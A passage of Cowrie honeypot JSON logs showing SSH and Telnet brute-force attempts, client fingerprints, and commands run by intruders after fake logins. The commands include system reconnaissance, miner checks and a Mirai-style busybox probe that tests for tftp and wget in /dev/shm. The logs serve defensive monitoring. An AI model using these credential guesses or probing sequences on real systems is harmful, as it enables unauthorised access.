openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:47:59.194007Z","src_ip":"196.251.86.249","session":"ffc9d924ec4c"}
{"eventid":"cowrie.login.failed","username":"user","password":"P@ssw0rd","message":"login attempt [user/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:48:01.087187Z","src_ip":"196.251.86.249","session":"ffc9d924ec4c"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:48:02.654506Z","src_ip":"196.251.86.249","session":"ffc9d924ec4c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50252,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8b6d086f648","protocol":"ssh","message":"New connection: 217.72.205.35:50252 (1.2.3.4:22) [session: f8b6d086f648]","sensor":"my-vps","timestamp":"2025-08-26T10:48:23.238467Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:48:23.239686Z","src_ip":"217.72.205.35","session":"f8b6d086f648"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41838,"dst_ip":"1.2.3.4","dst_port":23,"session":"72b99a58b7fa","protocol":"telnet","message":"New connection: 212.227.235.229:41838 (1.2.3.4:23) [session: 72b99a58b7fa]","sensor":"my-vps","timestamp":"2025-08-26T10:48:31.509603Z"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":39520,"dst_ip":"1.2.3.4","dst_port":22,"session":"471fc53f56c7","protocol":"ssh","message":"New connection: 93.123.109.189:39520 (1.2.3.4:22) [session: 471fc53f56c7]","sensor":"my-vps","timestamp":"2025-08-26T10:48:51.756545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:48:51.757437Z","src_ip":"93.123.109.189","session":"471fc53f56c7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T10:48:51.776545Z","src_ip":"93.123.109.189","session":"471fc53f56c7"}
{"eventid":"cowrie.login.failed","username":"validator","password":"123456","message":"login attempt [validator/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:48:51.835234Z","src_ip":"93.123.109.189","session":"471fc53f56c7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:48:52.856160Z","src_ip":"93.123.109.189","session":"471fc53f56c7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":49500,"dst_ip":"1.2.3.4","dst_port":22,"session":"171b876df16f","protocol":"ssh","message":"New connection: 196.251.86.249:49500 (1.2.3.4:22) [session: 171b876df16f]","sensor":"my-vps","timestamp":"2025-08-26T10:48:59.183251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:48:59.809588Z","src_ip":"196.251.86.249","session":"171b876df16f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:48:59.810291Z","src_ip":"196.251.86.249","session":"171b876df16f"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwe123","message":"login attempt [user/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:49:02.262211Z","src_ip":"196.251.86.249","session":"171b876df16f"}
{"eventid":"cowrie.session.closed","duration":31.356917142868042,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:02.866451Z","src_ip":"212.227.235.229","session":"72b99a58b7fa"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:03.859225Z","src_ip":"196.251.86.249","session":"171b876df16f"}
{"eventid":"cowrie.session.connect","src_ip":"110.39.166.75","src_port":49829,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbacecc5b6f3","protocol":"ssh","message":"New connection: 110.39.166.75:49829 (1.2.3.4:22) [session: bbacecc5b6f3]","sensor":"my-vps","timestamp":"2025-08-26T10:49:19.343138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T10:49:19.372036Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.client.kex","hassh":"44ac1859818d6cacfb48ec9cb230b3f0","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 44ac1859818d6cacfb48ec9cb230b3f0","sensor":"my-vps","timestamp":"2025-08-26T10:49:19.531773Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T10:49:21.107539Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:49:22.267540Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:22.609980Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T10:49:22.610728Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T10:49:22.611475Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:22.772177Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:23.203087Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-26T10:49:23.203976Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:23.367095Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:23.745079Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T10:49:23.745889Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":59924,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ba043c603a0","protocol":"ssh","message":"New connection: 45.88.8.186:59924 (1.2.3.4:22) [session: 9ba043c603a0]","sensor":"my-vps","timestamp":"2025-08-26T10:49:23.901475Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:23.907329Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:24.242919Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-26T10:49:24.243913Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:49:24.571787Z","src_ip":"45.88.8.186","session":"9ba043c603a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:49:24.573462Z","src_ip":"45.88.8.186","session":"9ba043c603a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:24.997157Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:25.585609Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T10:49:25.586280Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:25.742754Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:26.079015Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T10:49:26.079815Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:26.237260Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:26.637697Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-26T10:49:26.638407Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/baaa3eb1b4234e92bb652c2992277b87dbe17c9080a5f6d842fc72563087dbd8","size":620,"shasum":"baaa3eb1b4234e92bb652c2992277b87dbe17c9080a5f6d842fc72563087dbd8","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/baaa3eb1b4234e92bb652c2992277b87dbe17c9080a5f6d842fc72563087dbd8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:26.797467Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.login.success","username":"root","password":"1975","message":"login attempt [root/1975] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:49:27.106094Z","src_ip":"45.88.8.186","session":"9ba043c603a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:27.426360Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-26T10:49:27.427323Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:27.587414Z","src_ip":"110.39.166.75","session":"bbacecc5b6f3"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:28.369202Z","src_ip":"45.88.8.186","session":"9ba043c603a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36292,"dst_ip":"1.2.3.4","dst_port":23,"session":"6718bc81712c","protocol":"telnet","message":"New connection: 212.227.235.229:36292 (1.2.3.4:23) [session: 6718bc81712c]","sensor":"my-vps","timestamp":"2025-08-26T10:49:30.842160Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"smcadmin","message":"login attempt [admin/smcadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T10:49:31.685483Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"zyad1234","message":"login attempt [supervisor/zyad1234] failed","sensor":"my-vps","timestamp":"2025-08-26T10:49:32.529932Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.login.success","username":"root","password":"7ujMko0admin","message":"login attempt [root/7ujMko0admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.375509Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:49:33.394798Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.662801Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.665698Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.666921Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.668429Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.669042Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.669626Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox IQESZ","message":"CMD: cat /proc/mounts; /bin/busybox IQESZ","sensor":"my-vps","timestamp":"2025-08-26T10:49:33.938957Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IQESZ","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IQESZ","sensor":"my-vps","timestamp":"2025-08-26T10:49:34.211755Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox IQESZ","message":"CMD: tftp; wget; /bin/busybox IQESZ","sensor":"my-vps","timestamp":"2025-08-26T10:49:34.482795Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T10:49:34.756447Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T10:49:34.761359Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"/bin/busybox IQESZ","message":"CMD: /bin/busybox IQESZ","sensor":"my-vps","timestamp":"2025-08-26T10:49:35.030502Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T10:49:35.033211Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T10:49:35.035272Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T10:49:35.036006Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/0b020d29a7f9dc2f23a1eb072f739a255695f5a3d5895dbdbecee85dc246a90f","size":3550,"shasum":"0b020d29a7f9dc2f23a1eb072f739a255695f5a3d5895dbdbecee85dc246a90f","duplicate":false,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/0b020d29a7f9dc2f23a1eb072f739a255695f5a3d5895dbdbecee85dc246a90f after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:35.037564Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.session.closed","duration":4.2006895542144775,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:49:35.042979Z","src_ip":"212.227.235.229","session":"6718bc81712c"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":34294,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b1a2b04f6db","protocol":"ssh","message":"New connection: 45.88.8.215:34294 (1.2.3.4:22) [session: 2b1a2b04f6db]","sensor":"my-vps","timestamp":"2025-08-26T10:49:37.332816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:49:37.664003Z","src_ip":"45.88.8.215","session":"2b1a2b04f6db"}
